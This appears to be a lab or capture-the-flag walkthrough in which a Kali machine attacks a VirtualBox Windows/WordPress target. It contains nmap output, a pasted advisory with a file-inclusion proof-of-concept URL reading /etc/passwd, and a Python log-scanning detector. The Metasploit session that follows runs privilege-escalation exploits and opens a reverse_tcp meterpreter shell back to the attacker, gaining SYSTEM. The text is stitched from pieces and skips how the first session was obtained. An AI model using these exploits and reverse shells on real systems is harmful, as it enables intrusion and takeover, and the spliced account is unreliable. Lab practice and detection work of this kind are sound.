3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.010 seconds (127.36 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -A 192.168.56.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 04:56 EST
Nmap scan report for 192.168.56.113
Host is up (0.00038s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
8080/tcp open  http          Apache httpd
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://tripladvisor:8080/wordpress/
MAC Address: 08:00:27:6B:61:B0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone
Running: Microsoft Windows Phone
OS CPE: cpe:/o:microsoft:windows
OS details: Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.56.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds
** CVE description ** A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
** Technical details ** In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.
By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept ** http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
** Solution ** No fix available yet.
** Timeline **
03/01/2018: author contacted through siteeditor.org’s contact form; no reply
16/01/2018: issue report filed on the public GitHub page with no technical details
18/01/2018: author replies and says he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us “another” e-mail
19/01/2018: report sent; author says he will fix this issue “very soon”
31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply
14/02/2018: WP Plugins team contacted; no reply
06/03/2018: vendor contacted; no reply
07/03/2018: vendor contacted; no reply
15/03/2018: public disclosure
** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).
– Best Regards,
Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI)
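Detection logic for the LFI described in the advisory above, run over constructed Apache access-log lines: an added example, not code from the advisory or from the Site Editor plugin. It assumes Apache combined-format logs; the client IPs, timestamps and the patterns/default.php value are made up.

```python
"""Added example (not the advisory's or plugin's code): scan Apache combined
access-log lines for ajax_shortcode_pattern.php requests whose ajax_path
escapes the plugin's own directory. The sample log lines are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_SCRIPT = "site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"
# Apache combined format: client, ident, user, [time], "METHOD URL PROTO", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are compared decoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_ajax_path(raw: str):
    """Return why this ajax_path value looks like file-inclusion abuse, or None if benign."""
    path = fully_decode(raw)
    if re.match(r"^[a-z][a-z0-9+.-]*://", path, re.I):  # php://, http://, data:// ...
        return "stream wrapper or remote URL"
    if path.startswith("/") or re.match(r"^[A-Za-z]:[\\/]", path):
        return "absolute path"
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", path):
        return "directory traversal"
    return None

def scan_log(lines):
    """Return (client_ip, status, reason, decoded ajax_path) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or VULN_SCRIPT not in m.group("url"):
            continue  # not the vulnerable endpoint (or not a parseable log line)
        query = parse_qs(urlsplit(m.group("url")).query, keep_blank_values=True)
        for raw in query.get("ajax_path", []):
            reason = classify_ajax_path(raw)
            if reason:
                findings.append((m.group("ip"), m.group("status"), reason, fully_decode(raw)))
    return findings

BASE = "/wordpress/wp-content/plugins/" + VULN_SCRIPT
SAMPLE_LOG = [  # constructed: one legitimate call, then the advisory's PoC and an encoded variant
    f'10.0.0.5 - - [25/Dec/2024:05:01:10 -0500] "GET {BASE}?ajax_path=patterns/default.php HTTP/1.1" 200 512',
    f'10.0.0.9 - - [25/Dec/2024:05:02:31 -0500] "GET {BASE}?ajax_path=/etc/passwd HTTP/1.1" 200 1904',
    f'10.0.0.9 - - [25/Dec/2024:05:02:45 -0500] "GET {BASE}?ajax_path=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1904',
]
```

A 200 status on a flagged request is the signal worth alerting on; a vendor fix would also replace the unrestricted require_once() with an allow-list of pattern files resolved inside the plugin directory.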
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
SESSION                           yes       The session to run this module on
SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.113 - Collecting local exploits for x64/windows...
[*] 192.168.56.113 - 198 exploit checks are being tried...
[+] 192.168.56.113 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.56.113 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.56.113 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.56.113 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.56.113 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Running check method for exploit 47 / 47
[*] 192.168.56.113 - Valid modules for session 1:
============================

#   Name                                                            Potentially Vulnerable?  Check Result
-   ----                                                            -----------------------  ------------
1   exploit/windows/local/bypassuac_comhijack                       Yes                      The target appears to be vulnerable.
2   exploit/windows/local/bypassuac_eventvwr                        Yes                      The target appears to be vulnerable.
3   exploit/windows/local/cve_2019_1458_wizardopium                 Yes                      The target appears to be vulnerable.
4   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move    Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
5   exploit/windows/local/cve_2020_1054_drawiconex_lpe              Yes                      The target appears to be vulnerable.
6   exploit/windows/local/cve_2021_40449                            Yes                      The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
7   exploit/windows/local/ms14_058_track_popup_menu                 Yes                      The target appears to be vulnerable.
8   exploit/windows/local/ms15_051_client_copy_image                Yes                      The target appears to be vulnerable.
9   exploit/windows/local/ms16_032_secondary_logon_handle_privesc   Yes                      The service is running, but could not be validated.
10  exploit/windows/local/ms16_075_reflection                       Yes                      The target appears to be vulnerable.
11  exploit/windows/local/ms16_075_reflection_juicy                 Yes                      The target appears to be vulnerable.
12  exploit/windows/local/agnitum_outpost_acs                       No                       The target is not exploitable.
13  exploit/windows/local/always_install_elevated                   No                       The target is not exploitable.
14  exploit/windows/local/bits_ntlm_token_impersonation             No                       The target is not exploitable.
15  exploit/windows/local/bypassuac_dotnet_profiler                 No                       The target is not exploitable.
16  exploit/windows/local/bypassuac_fodhelper                       No                       The target is not exploitable.
17  exploit/windows/local/bypassuac_sdclt                           No                       The target is not exploitable.
18  exploit/windows/local/bypassuac_sluihijack                      No                       The target is not exploitable.
19  exploit/windows/local/canon_driver_privesc                      No                       The target is not exploitable. No Canon TR150 driver directory found
20  exploit/windows/local/capcom_sys_exec                           No                       Cannot reliably check exploitability.
21  exploit/windows/local/cve_2020_0796_smbghost                    No                       The target is not exploitable.
22  exploit/windows/local/cve_2020_1048_printerdemon                No                       The target is not exploitable.
23  exploit/windows/local/cve_2020_1313_system_orchestrator         No                       The target is not exploitable.
24  exploit/windows/local/cve_2020_1337_printerdemon                No                       The target is not exploitable.
25  exploit/windows/local/cve_2020_17136                            No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
26  exploit/windows/local/cve_2021_21551_dbutil_memmove             No                       The target is not exploitable.
27  exploit/windows/local/cve_2022_21882_win32k                     No                       The target is not exploitable.
28  exploit/windows/local/cve_2022_21999_spoolfool_privesc          No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
29  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver   No                       The target is not exploitable.
30  exploit/windows/local/cve_2023_21768_afd_lpe                    No                       The target is not exploitable. The exploit only supports Windows 11 22H2
31  exploit/windows/local/cve_2023_28252_clfs_driver                No                       The target is not exploitable. The target system does not have clfs.sys in system32\drivers\
32  exploit/windows/local/cve_2024_30088_authz_basep                No                       The target is not exploitable. Version detected: Windows 2008 R2
33  exploit/windows/local/gog_galaxyclientservice_privesc           No                       The target is not exploitable. Galaxy Client Service not found
34  exploit/windows/local/ikeext_service                            No                       The check raised an exception.
35  exploit/windows/local/lexmark_driver_privesc                    No                       The target is not exploitable. No Lexmark print drivers in the driver store
36  exploit/windows/local/ms10_092_schelevator                      No                       The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable
37  exploit/windows/local/ms15_078_atmfd_bof                        No                       Cannot reliably check exploitability.
38  exploit/windows/local/ms16_014_wmi_recv_notif                   No                       The target is not exploitable.
39  exploit/windows/local/ntapphelpcachecontrol                     No                       The check raised an exception.
40  exploit/windows/local/nvidia_nvsvc                              No                       The check raised an exception.
41  exploit/windows/local/panda_psevents                            No                       The target is not exploitable.
42  exploit/windows/local/ricoh_driver_privesc                      No                       The target is not exploitable. No Ricoh driver directory found
43  exploit/windows/local/srclient_dll_hijacking                    No                       The target is not exploitable. Target is not Windows Server 2012.
44  exploit/windows/local/tokenmagic                                No                       The target is not exploitable.
45  exploit/windows/local/virtual_box_opengl_escape                 No                       The target is not exploitable.
46  exploit/windows/local/webexec                                   No                       The check raised an exception.
47  exploit/windows/local/win_error_cve_2023_36874                  No                       The target is not exploitable.

[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_comhijack
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > show options
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.160.100  yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_comhijack) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(windows/local/bypassuac_comhijack) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: bad-config: x86 payload selected for x64 system
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > show options

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.160.100  yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 192.168.56.102:4444
[-] Exploit aborted due to failure: no-target: Session and Target arch must match
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/cve_2019_1458_wizardopium
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.160.100  yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows 7 x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set session 1
session => 1
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > run

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 264 launched.
[*] Reflectively injecting the DLL into 264...
[*] Sending stage (203846 bytes) to 192.168.56.113
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.113:49571) at 2024-12-25 05:58:20 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >